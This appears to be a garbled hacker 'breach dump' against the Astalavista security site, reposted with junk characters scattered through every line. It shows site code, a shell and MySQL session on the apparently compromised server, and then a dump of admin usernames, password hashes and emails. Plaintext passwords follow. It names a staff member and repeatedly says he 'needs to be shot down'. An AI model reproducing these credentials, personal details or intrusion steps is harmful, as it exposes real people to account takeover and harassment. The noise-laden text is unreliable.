4 _: S4 y: S1 V5 c; p            $comExploits[$x]['changelog'] = $date;
  ^9 J2 h+ r0 j$ \1 |0 v4 }/ V7 T  Z- W" F3 x5 `$ h+ S5 m
        }1 k$ g7 a- H* B1 ^, ^
[snip]+ B/ e2 e* c, _3 i! T1 h+ |# e
    $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>3 _/ Q9 p; r( B+ ]3 T5 X2 ~  K
<rss version=”2.0″>9 O" m8 {  L1 i+ }+ U
    <channel>7 R! l+ c4 ~! D) x
        <title>ASTALAVISTA.com - Exploits</title>
. H4 R/ j* T/ {" Q        <link>http://www.astalavista.com/exploits</link>
! e' S& H5 W; O8 K4 |. k5 k) c* H        <description>All availably Exploits.</description>- M* c1 h' r) b+ \. q0 X& D: e
        <language>en-us</language>' Z, G" L4 g9 Y
        <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
/ i$ |( [2 U/ ]  d# s; o! S        <docs>http://blogs.law.harvard.edu/tech/rss</docs>
8 t2 b! u  c1 y* q" H        <generator>Astalavista.com</generator>  N* O" h' g  J
        <webMaster>info@astalavista.com</webMaster>’ . $items . ‘- v7 O  w0 U+ X+ r% O1 i+ f) c) N1 [
    </channel>+ u6 ~- L/ l7 A  u: A, R+ t
</rss>’;& a2 r% \5 c9 A: c0 Y
& H" ]0 ]/ q" [5 Y
    if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {; m! _; o9 H! f2 j# L4 i- b
        unlink (FULLPATH . ‘/feed/exploits.xml’);* S  l, }; f4 ~7 \1 M
    }
" Z5 X$ g- G" C( z  [0 z9 `8 {/ _8 f- `
    file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
. a3 A8 T( @% F2 h3 b# p9 d[snip]; v+ @" o, L( ]' y( C  Q
1 R! t" M9 V; b3 t% O2 L& B
sh-3.2$ cat exploits.sh
) d# a/ V  X2 o; ^+ u5 Y#!/bin/sh& z- E! ]" N8 p/ u& R9 O, c$ m

  T5 B) Q9 q) m+ H$ E, [+ y& N###########################################################
5 B0 h# {) p7 N5 |. u+ b#                                                         #- m4 H- K0 D' m! B" i
#   Title:        milw0rm exploits adder                  #6 \, e& e; i3 A
#   Description:  Add all milw0rm exploits to the         #% C! q4 ?7 P2 h9 Q! K
#                 Astalavista.com database                #3 Q8 Y" v: A$ R: K6 P( F" X# r
#                                                         #
+ }: [( z# A: \# v# H1 a#   Company:      Astalavista Group                       #1 f, {# C; N1 J7 _; L
#   Author:       Paulo M. Santos                         #
/ n% E5 A: F( n- E' v# A) u#   E-Mail:       链接标记paulo.santos@astalavista.ch             #5 j' A6 U( ^* T
#                                                         #, R( E# _4 e+ ~2 `6 |/ r
###########################################################
9 K1 ?, }( u. V  Y2 |* Q! Y( r5 s5 j* s* P$ g) r
# path
# g0 B$ l( J1 |this_path=/home/com/public_html/modifications/cronjobs/ R. T3 U2 N3 b3 T) ^
* o# }* u. M/ u# I( F4 R8 V1 \4 F6 L
# change directory$ w( W5 J$ _" P! G) q
cd $this_path- `9 A; n9 v$ f6 E4 ~
cd tmp/7 T2 N! C2 l7 @  f0 Q

* |3 L% l& `. R6 f! P; v' m# delete files) R) ]: S- {0 }; @* R) k
rm -rf milw0rm.tar.* &8 L7 Q' U& g/ a) N; L
rm -rf milw0rm/ &
, W5 H" G9 I2 X6 q: @# w
" M& C: d# B% |* K5 `& P# wget milw0rm paket
$ H7 X, A! @( Q& U% j/ r  Jwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
8 m* [# q! c6 v
  c9 R/ q5 }% r* ~$ h! S# extract milw0rm paket, p/ a! [% l4 M' Z8 n, _- ?
tar -xvf milw0rm.tar.bz2
2 w! o- z9 U  V  Z2 y. j" j( X; W( n
# change owner
5 I  I6 C* F$ m+ q# J# c/ ]0 dchown -R com .
" r) t% Z  L0 U* b; q: q& |* {) Gchgrp -R com .
1 H0 l' E* ^6 E& \; d# t( x5 Q+ x% d' ~9 e9 H: w8 Y" _
# execute php script
) w4 q0 L; k, pcd $this_path
! @( c/ ~( u/ j' [  U% iphp -q exploits.php. B, K9 M9 w5 l
, E  I; Z9 r$ Z  n* j- _( z( O' P
# delete files
( B. ~/ m$ M: R% w2 ?rm -rf tmp/milw0rm.tar.*7 B! {+ H# w9 ~2 O" r: n. o
rm -rf tmp/milw0rm/. Q7 y1 j8 D: m& D  f

! _: _9 A4 g0 _9 X3 a& Ash-3.2$ echo “Paulo M. Santos needs to be shot down.”
0 B1 ]: w4 p. v& hPaulo M. Santos needs to be shot down./ b1 t  J( Y' i$ n4 H
$ h- h, Q$ T3 a$ |
mysql -u contrexxuser2 -p* Y' m2 H2 Q$ K
Enter password:
& {( X: u8 H- t' {Welcome to the MySQL monitor.  Commands end with ; or \g.
2 v) t" n* z! T: v) n6 ?: _9 tYour MySQL connection id is 261694) G+ T: [! o/ Y% m# `# I
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
, ]. M0 d0 K9 c- O
3 [9 S8 C1 n2 O+ t6 B. ~. R; VType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.. I* k# |9 `; p1 _# v. u- o
# u0 W. h3 q; m# f1 L
mysql> show databases;
' B. r: a7 _3 K( e; N+——————–+, ~, ?+ z" X+ o6 n* T7 y0 O: H$ D" ^
| Database           |
5 r- j/ k# w, _( l3 g( F- m* w+——————–+
, l" v8 G0 Y7 x$ z& M1 B| information_schema |; b9 I! q; y9 F) w" T8 U
| com_contrexx2      |. C; k6 g4 L2 G' z: g6 ]  n
| com_contrexx2_live |+ B" m3 W: v8 g) l& p; x
| test               |  D! ?- d- M. g) G- o( o0 y5 \
+——————–+
& S6 T; M& K9 a; Z! q9 o4 rows in set (0.00 sec)
+ D4 Y0 C& h- W, G9 v; z
! Y5 U( C5 o7 z# r* z# [mysql> use com_contrexx2_live
/ Z- e1 u5 m, L' }Database changed
& z8 _; Q( \) Q' s- S( x# A9 C6 \mysql> show tables;- k  o# L- g( q$ Q/ i
+————————————————–+
" p  c: U/ c% j6 S8 D9 [6 ?| Tables_in_com_contrexx2_live                     |: H' F9 p$ S$ z# y$ B* x
+————————————————–+( f' K5 x- V1 k) R; e
| cc_banner_counter                                |( r  J8 e4 W. }6 j  C+ _. X
| cc_search_counter                                |
$ X, H4 O, G: V. ]" l& L| contrexx_access_group_dynamic_ids                |3 L7 r  t! [$ g; `
| contrexx_access_group_static_ids                 |' b% m( N) O! Q. _5 r& B( p) v2 Q
| contrexx_access_rel_user_group                   |
. y% `' G& Z7 |) j| contrexx_access_settings                         |
' X, x5 q  O4 S6 Y0 a| contrexx_access_user_attribute                   |
5 {8 Y6 B! i$ u5 y| contrexx_access_user_attribute_name              |
* _; w. N; u9 [0 B- D2 e) f| contrexx_access_user_attribute_value             |0 Y0 ]. r) F$ \# D7 L
| contrexx_access_user_core_attribute              |3 a7 t' {1 z7 {8 x+ l+ b7 F
| contrexx_access_user_groups                      |5 K# n% }) Y) m$ O! L& ]
| contrexx_access_user_mail                        |
6 L' p0 S4 M" c" o| contrexx_access_user_profile                     |* H% \, Z9 b7 B) D0 ?* r
| contrexx_access_user_title                       |+ ~) F5 L' d6 p+ ~$ g3 c; c
| contrexx_access_user_validity                    |" B/ Z2 _7 M. v* e* K0 L- l( j
| contrexx_access_users                            |
" x2 b. P  l, }, K: s  T| contrexx_backend_areas                           |
, ]$ v, k) c+ [  g3 j! x| contrexx_backups                                 |/ z8 k2 T$ ^; Y% V8 W
| contrexx_content                                 |
3 y- t3 R1 j9 ?+ Z, q% b2 \| contrexx_content_history                         |
9 m+ f* H/ l1 x- Q! }" k| contrexx_content_logfile                         |
5 Y! [+ X- i( c1 F. U( p| contrexx_content_navigation                      |, a5 a- ~; k& D  S
| contrexx_content_navigation_history              |( E4 u  P1 p: ~( f3 [" x
| contrexx_ids                                     |
5 _- O3 `2 v- X- H; n  H6 R2 O| contrexx_languages                               |
/ B, j! M% T+ Q& ]( j| contrexx_lib_country                             |
* E; v! L' y/ G, X7 P" v0 n0 q' o| contrexx_log                                     |. X, Y) f5 {* {$ K  y, u  L
| contrexx_module_alias_source                     |" U% ^3 ?6 u9 y0 e7 u
| contrexx_module_alias_target                     |- @2 C% U" n& Z! Y, O+ N8 M
| contrexx_module_block_blocks                     |* I9 Y8 P, D2 H; T
| contrexx_module_block_rel_lang                   |
7 n4 L$ s1 u7 F, r$ s| contrexx_module_block_rel_pages                  |6 C' X+ s5 r: v- \
| contrexx_module_block_settings                   |
+ k2 E! N" ]: H5 M4 A8 w8 K9 S4 e| contrexx_module_blog_categories                  |. m& R/ u2 U0 A6 s
| contrexx_module_blog_comments                    |& k) a' z2 y2 r/ R4 ^
| contrexx_module_blog_message_to_category         |
4 O0 G" t9 S1 B4 _4 |7 M| contrexx_module_blog_messages                    |# O  E2 P+ U. v1 ^" o) d
| contrexx_module_blog_messages_lang               |
+ k; t1 M- B% ~4 F# A| contrexx_module_blog_networks                    |# f% s) J7 o4 c! b# q( C! N! _: D
| contrexx_module_blog_networks_lang               |
2 Z5 q5 t; l/ B2 q8 H$ u# i| contrexx_module_blog_settings                    |
) ~5 T8 f$ L4 \3 n| contrexx_module_blog_votes                       |
% ]1 {7 h+ G/ d! O! j- [' K1 Q| contrexx_module_calendar                         |3 Q- K. J  w% E  H; I1 D' i: A( A
| contrexx_module_calendar_access                  |( _: e8 ?. c7 R! m  D# ?
| contrexx_module_calendar_categories              |2 F) i! N* _1 j) y5 o1 b
| contrexx_module_calendar_form_data               |; z* l9 W2 j2 R& s' z2 j
| contrexx_module_calendar_form_fields             |+ R0 |/ D8 y+ e, q8 K' m* k9 e
| contrexx_module_calendar_registrations           |; G  S: a. S( G+ m
| contrexx_module_calendar_settings                |
1 k( [2 B3 ^1 T, U$ L* Y& Z| contrexx_module_calendar_style                   |# V7 h8 E: s) J# i: N8 a
| contrexx_module_contact_form                     |" l0 S% n2 L6 Y5 O9 \& b9 F
| contrexx_module_contact_form_data                |& s+ y: [: S! e0 ~2 z, V
| contrexx_module_contact_form_field               |, [  R8 O& H: }
| contrexx_module_contact_settings                 |
2 H  {( e0 R  Y7 @8 f8 Y) S8 d5 i2 U| contrexx_module_data_categories                  |
# R9 d" C0 U6 K0 ^0 n1 x| contrexx_module_data_message_to_category         |  n% p4 O. J1 x1 I2 s% G; a; p& @
| contrexx_module_data_messages                    |
3 r) K! B" ~+ Y! J: ~7 }| contrexx_module_data_messages_lang               |
7 M7 d; h) ~* b9 K4 D; b| contrexx_module_data_placeholders                |5 ?1 B# r* r' B' b; {# `
| contrexx_module_data_settings                    |
" M4 K' E" d3 E8 Z1 w6 n1 p| contrexx_module_directory_access                 |
1 O7 C8 @' Z4 |3 _( N| contrexx_module_directory_categories             |
3 `! I) `" r& i1 E: S: ?# K) m| contrexx_module_directory_dir                    |4 I' c) _, m) y
| contrexx_module_directory_inputfields            |
* `+ J. z) w$ C7 k| contrexx_module_directory_levels                 |
  r6 `8 z) p! l6 ^4 \| contrexx_module_directory_mail                   |& B2 A6 b" L5 K2 ]4 S% V
| contrexx_module_directory_rel_dir_cat            |
0 _) R( O2 R2 @# @| contrexx_module_directory_rel_dir_level          |
( W( W, D" V4 G| contrexx_module_directory_settings               |
- t3 L- z, c; q. P/ J1 y( {| contrexx_module_directory_settings_google        |
# Y" d( m/ @+ U0 ~| contrexx_module_directory_vote                   |
; P3 t. m1 \  ~# A9 b| contrexx_module_docsys                           |8 u2 c7 d9 ]( e! x9 j7 Q
| contrexx_module_docsys_categories                |
5 T% V% n7 O* S+ q| contrexx_module_egov_configuration               |
9 p2 y" z% {# g( ^; ^| contrexx_module_egov_orders                      |
) x% N' y3 X. Q& p| contrexx_module_egov_product_calendar            |
' W: _0 N7 F) q1 J| contrexx_module_egov_product_fields              |
: E# A1 R/ n. S' l7 T* j% o: V| contrexx_module_egov_products                    |
$ J+ G2 o, m* V8 H5 R2 k- v) U% f| contrexx_module_egov_settings                    |
  m* w# n( S) p8 E. M| contrexx_module_exploits                         |9 ?7 ~/ k6 J' ~* ]
| contrexx_module_exploits_categories              |
- x3 i: f% j" i| contrexx_module_feed_category                    |
3 s- V, Y; D/ `. o: r% `! F% Y| contrexx_module_feed_news                        |! b/ O0 ]+ {6 }
| contrexx_module_feed_newsml_association          |
" A0 D# S  R0 J3 J. m; h2 n| contrexx_module_feed_newsml_categories           |
/ \4 X' ~7 i, ^6 T| contrexx_module_feed_newsml_documents            |% G& a' X  y$ `1 i' x& v
| contrexx_module_feed_newsml_providers            |& ]& r9 F6 `/ z3 Q
| contrexx_module_forum_access                     |
' B. C' G! P4 V" c& w- r| contrexx_module_forum_categories                 |
; R* }2 k+ E% m' I* @| contrexx_module_forum_categories_lang            |2 y. b3 E) e1 |2 E- Y
| contrexx_module_forum_notification               |2 b" C) U! r# ^" {) `5 C
| contrexx_module_forum_postings                   |/ c; ?: q0 {! p4 G4 X" `$ D1 d) x
| contrexx_module_forum_rating                     |
1 K, _) s1 X6 J( f9 ]| contrexx_module_forum_settings                   |
0 M8 P% \4 N  `- J( V- p/ v| contrexx_module_forum_statistics                 |! p; r$ b; l- f  d" k$ T4 X& V
| contrexx_module_gallery_categories               |
4 c: l% N9 \  Y- h| contrexx_module_gallery_comments                 |
, @: E  A% V7 e* C| contrexx_module_gallery_language                 |! @3 I$ e0 J  i4 m: R% S( b! c
| contrexx_module_gallery_language_pics            |
; D. J: x' Y5 Q! E| contrexx_module_gallery_pictures                 |
, a( |7 h7 m( k/ q7 Z! R% i- ]| contrexx_module_gallery_settings                 |
8 [) J5 m( q' s2 o7 d" T| contrexx_module_gallery_votes                    |
# G4 Y8 Q- D2 c! Y| contrexx_module_guestbook                        |
- b+ I7 |- u2 G5 P4 [8 C# K| contrexx_module_guestbook_settings               |9 @0 {7 `, R$ k5 \+ a( G7 V
| contrexx_module_livecam                          |' j- r+ e" [- w2 Z! g5 s
| contrexx_module_livecam_settings                 |+ D6 g7 P: n- d; Z7 x9 Q. ]$ `
| contrexx_module_market                           |
; ?4 R6 ^5 A1 \2 {% W| contrexx_module_market_access                    |
+ w' O( `; P! Y, z. j| contrexx_module_market_categories                |
) O* g: w; r: Y' S6 C& ], ^| contrexx_module_market_mail                      |: n# V7 N8 Z3 s9 V
| contrexx_module_market_paypal                    |
6 Q3 N0 c; F& P2 J- c6 N; ]2 `/ H| contrexx_module_market_settings                  |% N# z. J( G1 {
| contrexx_module_market_spez_fields               |8 h9 z; M1 q, k5 a- F
| contrexx_module_mediadir_access                  |$ r1 @2 W' p2 r' G! O
| contrexx_module_mediadir_categories              |
0 X; X/ r. V$ @' _% u| contrexx_module_mediadir_comments                |- R. M' ~# d  f9 e& t+ m
| contrexx_module_mediadir_dir                     |0 |" Q+ W8 N7 p- s9 P& W
| contrexx_module_mediadir_inputfields             |
! L; W3 d' {7 R| contrexx_module_mediadir_levels                  |
+ Z( a' p& |7 x0 c7 l& i, m4 D0 `| contrexx_module_mediadir_mail                    |% \0 ^) |4 v* l0 n: B2 O
| contrexx_module_mediadir_rel_dir_cat             |# c  r. U5 S7 f" Y1 E. M
| contrexx_module_mediadir_rel_dir_level           |2 D# A  B- ?# d& @$ U! O
| contrexx_module_mediadir_reports                 |. t' g8 ^( q- `, e
| contrexx_module_mediadir_settings                |
+ q- Z6 n3 P2 I- Y8 ?| contrexx_module_mediadir_settings_google         |
. K' L$ q" a. \# u" @1 w0 @| contrexx_module_mediadir_vote                    |: v: C! h* n5 z6 \, o" E% a( j
| contrexx_module_memberdir_directories            |
. R: X. }* w3 s2 t| contrexx_module_memberdir_name                   |* D" O: ?5 G( F% Z4 E  |
| contrexx_module_memberdir_settings               |* l' H* l1 x# F* Y! |7 D2 H
| contrexx_module_memberdir_values                 |
2 \; {. P& e* i$ d- P# K| contrexx_module_nettools_allowed_groups          |5 U' Q: `" x* o6 j0 k' R7 l
| contrexx_module_nettools_settings                |' Z  \) {3 V  G( K. n5 [
| contrexx_module_news                             |  ]& V1 @' i. n8 }+ A/ v
| contrexx_module_news_access                      |# V5 e. m8 F1 ~. W  A6 p5 \% S/ u
| contrexx_module_news_categories                  |
& F6 }) p% i" m* O! D# q| contrexx_module_news_settings                    |
6 S& W- {# A/ C2 @0 u1 a; P7 n| contrexx_module_news_teaser_frame                |
) |  s% x: v' J+ N% r| contrexx_module_news_teaser_frame_templates      |
" _  [) X2 O0 T2 v2 _* \| contrexx_module_news_ticker                      |  v  Z" f( A1 `* M! t7 m% j1 V, S
| contrexx_module_newsletter                       |) ^7 `: Q3 e9 m& q& M4 O; r3 C$ f) _8 C
| contrexx_module_newsletter_attachment            |
/ l2 [; l8 c( {7 W9 p5 ^% a- M| contrexx_module_newsletter_category              |7 m2 P  J' [' Z4 H
| contrexx_module_newsletter_confirm_mail          |
7 t% Z) C; s8 l9 l: J1 F' E9 K| contrexx_module_newsletter_rel_cat_news          |4 X( E' V/ |; }  `8 ^
| contrexx_module_newsletter_rel_user_cat          |$ ^  t. g; x9 K0 @
| contrexx_module_newsletter_settings              |1 m3 k+ N( H: N7 Z3 ?
| contrexx_module_newsletter_template              |" _1 o+ q) S- R( p3 g3 w
| contrexx_module_newsletter_tmp_sending           |' r0 w- b* z4 Y2 j9 O
| contrexx_module_newsletter_user                  |# Z2 s5 M/ A' k; X
| contrexx_module_newsletter_user_title            |
# V5 _) b3 ^. [2 W# P) B$ k, Z| contrexx_module_onlinetools_defaultports         |2 L; y: M; j+ X+ ^3 T2 A# Y2 _
| contrexx_module_onlinetools_defaultports_back    |
% t7 e" A& F4 l2 e6 v| contrexx_module_onlinetools_geolitecity_blocks   |; T) C- ^; l- C- J
| contrexx_module_onlinetools_geolitecity_country  |1 [7 J' t" D4 f  c9 k( t9 s2 d
| contrexx_module_onlinetools_geolitecity_location |% \3 h3 K2 c4 h0 S6 G# @
| contrexx_module_podcast_category                 |/ s" @* V) D5 Q- {
| contrexx_module_podcast_medium                   |% _( l9 e  z4 }( D; k, _6 V
| contrexx_module_podcast_rel_category_lang        |4 x+ ]$ X5 _, J: A- e
| contrexx_module_podcast_rel_medium_category      |
& p( U9 I( S( C| contrexx_module_podcast_settings                 |* L& Z1 X7 [/ p& ?, i% W
| contrexx_module_podcast_template                 |
0 r1 {8 ^  C3 K, }| contrexx_module_proxydb                          |
* I2 ]" Y' q) O1 f2 j| contrexx_module_recommend                        |
" g7 L( p2 D' h) ^, b| contrexx_module_repository                       |
/ ]9 ?2 |, N4 p| contrexx_module_securitynews_cats                |
' ]% x+ {' _7 g: U5 ]1 m  G: E! o8 V| contrexx_module_securitynews_feeds               |
$ o: x& M+ Y. p| contrexx_module_securitynews_news                |
$ _1 v2 Y; @% W1 C( A" V/ _, ]| contrexx_module_shop_categories                  |' D) K9 \# m1 R
| contrexx_module_shop_config                      |7 l' J8 F# j. T- m* I5 d- g2 T
| contrexx_module_shop_countries                   |) m* F  Q! K8 r8 Y4 G
| contrexx_module_shop_currencies                  |$ I, y  R# U& n( v
| contrexx_module_shop_customers                   |
5 b: H! ~, k; a, K| contrexx_module_shop_importimg                   |* I7 K+ {9 x* O1 v' R4 P  g
| contrexx_module_shop_lsv                         |5 l! _) i  S7 I: T
| contrexx_module_shop_mail                        |& J$ Y; {3 M1 ?/ s$ L1 n7 S
| contrexx_module_shop_mail_content                |
8 {% ?! d. ~4 b' s| contrexx_module_shop_manufacturer                |
3 {9 n! h' i# v- O; S# d$ ~# R% M| contrexx_module_shop_order_items                 |2 X. g: n/ ~% z
| contrexx_module_shop_order_items_attributes      |3 g: U6 O. y: v6 M
| contrexx_module_shop_orders                      |( Q2 w# ~& Y# m0 g( V
| contrexx_module_shop_payment                     |
+ `; R5 Y; H2 q+ D4 Y| contrexx_module_shop_payment_processors          |% o2 _* Y  q) J9 t9 x
| contrexx_module_shop_pricelists                  |
/ ?- \6 @! @& }" h  @, d| contrexx_module_shop_products                    |
1 Y4 ?& H" Y: L' W+ P, S; J/ O9 D| contrexx_module_shop_products_attributes         |
6 y/ C" d, U7 p" F3 _, l| contrexx_module_shop_products_attributes_name    |
1 }& l+ H# ?0 d" e) H% B# q7 a| contrexx_module_shop_products_attributes_value   |
  M, X' v3 A! U# p1 y1 ]" z( k| contrexx_module_shop_products_downloads          |5 A, d2 K/ J4 R& }
| contrexx_module_shop_rel_countries               |
6 D. V5 u. L/ g7 [& k. i# {, v5 }| contrexx_module_shop_rel_payment                 |0 z$ S4 R9 d- e2 R0 F0 V
| contrexx_module_shop_rel_shipment                |
1 b3 P: K# b! ]- Q1 || contrexx_module_shop_shipment_cost               |+ H) ^7 U  X4 s6 h7 P4 [6 a
| contrexx_module_shop_shipper                     |
  X+ H/ i. h4 Q3 V$ x2 c# L| contrexx_module_shop_vat                         |
6 @( v! e/ k( i' u' r' G- V4 T; N| contrexx_module_shop_zones                       |
) B  B: l. N( R- T7 ~& U| contrexx_module_u2u_address_list                 |
8 ]8 X; D2 X. X% Q1 P# q4 d3 t| contrexx_module_u2u_message_log                  |+ g2 C$ u7 g% l! u, [: e
| contrexx_module_u2u_sent_messages                |8 O2 c+ i# D6 ?' t# @; H9 `$ w( p
| contrexx_module_u2u_settings                     |
* c4 d' `$ d6 s: @2 ^9 K| contrexx_module_u2u_user_log                     |
" P0 \0 Q- o: U5 C2 Y5 e% {  N| contrexx_modules                                 |
% w3 |8 T1 F. m1 K& n1 l; ^2 f| contrexx_sessions                                |
& G. ?# I! ~4 p+ S& [  Q1 s| contrexx_settings                                |
. J# S) M/ N, s. N( H% t* T| contrexx_settings_smtp                           |
0 L9 V! A6 f5 U& y| contrexx_skins                                   |  b7 u9 ?6 o7 k' |5 l, X
| contrexx_stats_browser                           |( l% U4 x) U) R! ?( `; z
| contrexx_stats_colourdepth                       |9 l% ?' h  `2 E% d* B5 S
| contrexx_stats_config                            |
1 n* T4 A% d( ^& t- C, b| contrexx_stats_country                           |
1 x) f( t; x$ X8 p+ p1 B: e$ d" || contrexx_stats_hostname                          |& E* C0 D  v/ b* j
| contrexx_stats_javascript                        |
, m! e) U  k' B5 i; b| contrexx_stats_operatingsystem                   |
" c1 e/ U: g) f  L0 {| contrexx_stats_referer                           |3 v+ L. h* t3 _0 T. c
| contrexx_stats_requests                          |2 O: Y1 d+ L9 d' s! \
| contrexx_stats_requests_summary                  |2 T$ C: @/ t8 C, b$ @8 r3 d0 V
| contrexx_stats_screenresolution                  |
2 }3 [1 \5 j8 A$ k- ]| contrexx_stats_search                            |
( e5 b9 [/ X+ N  q6 M1 y| contrexx_stats_spiders                           |
+ Q9 E# O4 q! n& g, n| contrexx_stats_spiders_summary                   |  s4 j& U, M  G2 G) H
| contrexx_stats_visitors                          |) d$ t1 I6 y: R% n
| contrexx_stats_visitors_summary                  |
; \0 _, A; k$ k- L6 A| contrexx_voting_additionaldata                   |
4 Z1 ]( p( b+ Z( {( M| contrexx_voting_email                            |
" s/ x4 X- P5 f! |9 s| contrexx_voting_rel_email_system                 |( q% Q) J0 |$ ^
| contrexx_voting_results                          |
8 {6 [2 ?' ?. N$ u) h6 w| contrexx_voting_system                           |. z4 \& p- @: g, ~/ I
| foo                                              |6 N; w& I6 M) j; b% T# M
+————————————————–+! j7 m% g+ }9 S, o! g
227 rows in set (0.01 sec)8 |7 M$ H& @- O9 u

1 q( j+ S' K* K# N6 @6 l4 Z+ Fmysql> select count(*) as skids from contrexx_access_users;
- r0 `5 F. X$ A* u+——-++ O+ Q6 H& e# M9 g, R
| skids |
, Y7 C# z* E$ u2 R8 ~" w4 }" ?+——-+
8 x0 j1 k, G3 q- A$ _| 53699 |
; H$ e1 i. P! o; C$ x+——-+
; v) V( [$ o% s1 row in set (0.00 sec)
$ R' R7 u- A. Z# ?9 R* j, {5 e% }/ |( B5 Q8 E) n
mysql> describe contrexx_access_users;
7 m( K3 D3 ]4 [- v, ^+——————+——————————————+——+—–+————–+—————-+. S$ C& ]1 i# s( g7 \9 A
| Field            | Type                                     | Null | Key | Default      | Extra          |+ G( I" E; Y. u6 U
+——————+——————————————+——+—–+————–+—————-++ q4 [! X  f& j. P: U% ]
| id               | int(10) unsigned                         | NO   | PRI | NULL         | auto_increment |% o) P+ u2 ?) Y8 z/ R! o/ S
| is_admin         | tinyint(1) unsigned                      | NO   |     | 0            |                |
# v- x; R' A0 ], u% ~0 K| username         | varchar(40)                              | YES  | MUL | NULL         |                |
6 D$ [1 j3 U' q/ Q| password         | varchar(32)                              | YES  |     | NULL         |                |9 N/ C4 [, D5 E
| regdate          | int(14) unsigned                         | NO   |     | 0            |                |  U# y0 y" u  w- F8 v4 n
| expiration       | int(14) unsigned                         | NO   |     | 0            |                |
5 y8 s4 m' e3 q| validity         | int(10) unsigned                         | NO   |     | 0            |                |8 }* a8 U4 N/ l0 T( s  D
| last_auth        | int(14) unsigned                         | NO   |     | 0            |                |0 K# S. h1 h7 j  A4 `' G
| last_activity    | int(14) unsigned                         | NO   |     | 0            |                |( t  ]! W# K$ {: J% }
| email            | varchar(255)                             | YES  |     | NULL         |                |3 J4 W' X/ F6 f! Y1 E
| email_access     | enum(’everyone’,'members_only’,'nobody’) | NO   |     | nobody       |                |1 D0 Y" ^3 q* F0 _6 K: m. Y
| frontend_lang_id | int(2) unsigned                          | NO   |     | 0            |                |5 f. s- W$ G' k0 U8 U9 u/ q4 ?
| backend_lang_id  | int(2) unsigned                          | NO   |     | 0            |                |
: H+ o9 q# {6 \6 j- R/ G' [| active           | tinyint(1)                               | NO   |     | 0            |                |1 n# ?* F* {' r; R
| profile_access   | enum(’everyone’,'members_only’,'nobody’) | NO   |     | members_only |                |
, F2 c3 `& B8 k* _; A| restore_key      | varchar(32)                              | NO   |     |              |                |
) j) I. }/ Q/ g/ s- X| restore_key_time | int(14) unsigned                         | NO   |     | 0            |                |' @9 L# x! j2 R6 d( c% ?) d
| u2u_active       | enum(’0′,’1′)                            | NO   |     | 1            |                |4 D$ v, T. M2 ]$ V  W) c# h8 }9 D
+——————+——————————————+——+—–+————–+—————-+
! ~8 e5 n. H6 S4 |18 rows in set (0.00 sec)
# M% l, n- h: e, Y1 `3 r9 e/ K
5 Y: y6 n6 j  W9 m3 J  gmysql> select username,password,email from contrexx_access_users where is_admin = 1;+ X( j, G$ q' W! ?8 M. u  x0 s
+————+———————————-+—————————–+0 h( I  |& e1 i/ U- a8 J. q5 z
| username   | password                         | email                       |4 o! F; J2 N5 \, c# ^
+————+———————————-+—————————–+& ?6 ~. ~" R) z! _( h9 O' O  A6 g
| system     | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com          |
, s$ q$ S4 g* [| prozac     | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com      |2 Y2 N( a+ B. S$ \& P
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |+ [' U4 W- I! e6 C
| schmid     | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com   |
8 f- I2 j2 F7 i( ], D! M9 }# K+————+———————————-+—————————–+
. S& J& m2 r' |4 rows in set (0.04 sec)' s/ O, }- J% k3 ~8 ~# u

& d) g- G  g, C  }- hmysql> exit;
$ j# m  Z2 q* C5 FBye
, u" F2 P3 r6 ]! j0 B; G4 W9 c$ t, y0 `& u
[~] There you go, your “team of security and IT professionals” is a joke.# z! Q# q& \1 |9 T9 k

9 c" h- g4 i; E1 [+——————————+9 y& N2 ?; }, E6 Q, `: z# E
system:f82BN3+_*1 L$ k  _% e! N9 G0 D
Be1er0ph0r:belerophor4astacom
! w4 F5 ?* b4 u3 k; C5 @; dprozac:asta4cms!' f# M7 d0 D0 z3 j
commander:mpbdaagf6m4 X4 A/ G0 d; Y8 ]# N5 D* G
sykadul:ak29eral
: P1 m1 O3 u* ^. W- l* x* D/ K+——————————+: q7 z6 a0 f1 s( x2 A0 [
5 @3 {. O: A; h; T# l' q
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
  D, A  B7 n. f) b8 }% Y…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.% [4 o. x; q/ @' t1 q4 k2 u3 U1 t
: \. z) K2 Y# O. B$ u+ s
[~] Lets move to astalavista.net now,# H2 y1 M# s, g1 a

5 U# P4 r9 k  PFrom <链接标记[url]https://www.astalavista.net/[/url]>:- K& a8 N4 z0 P- a
>> Everyone knows that the best defense is a good offense.
( Z1 u) n1 b( H0 K' X>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
& C9 e( u! ^# T>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
1 p  g/ i3 S. h! [& [  L2 x>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”# k3 ]3 a4 I; _
: F: h2 G; ^; g7 V) B7 v1 q: x
>> Go ahead, try and hack our server . in a completely legal way!( c0 t$ w. q& N3 ^. f: }
>> Learn by doing: We offer our members tricky tasks and challenges on an/ e& C) Z* P4 k& L8 S1 H
>> ongoing basis so you can test your knowledge and abilities. You can also  F+ N) W$ i& D" P$ X1 I$ q
>> demonstrate what you.ve mastered by taking part in regular hacker contests8 R3 Q- ]5 F+ c) m8 l
>> and war games
  B: a1 A7 J" X/ p4 H6 h: e0 L8 b+ [1 ~, E; w* \3 X! z
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
+ V+ ]3 c# Z% e1 n- w# K
0 j5 J# y! [3 B1 Y9 q; j9 e9 D[-] Tricky task: Find home dir of astalavista.net' y* x' @; \% @
* b4 \6 ?, h* I4 a3 y
sh-3.2$ ls -la ~astanet
! Z  D' J4 b0 atotal 483 g3 e3 r& r7 ]% E" O
drwx–x–x  6 astanet astanet 4096 Dec 23 15:55 .
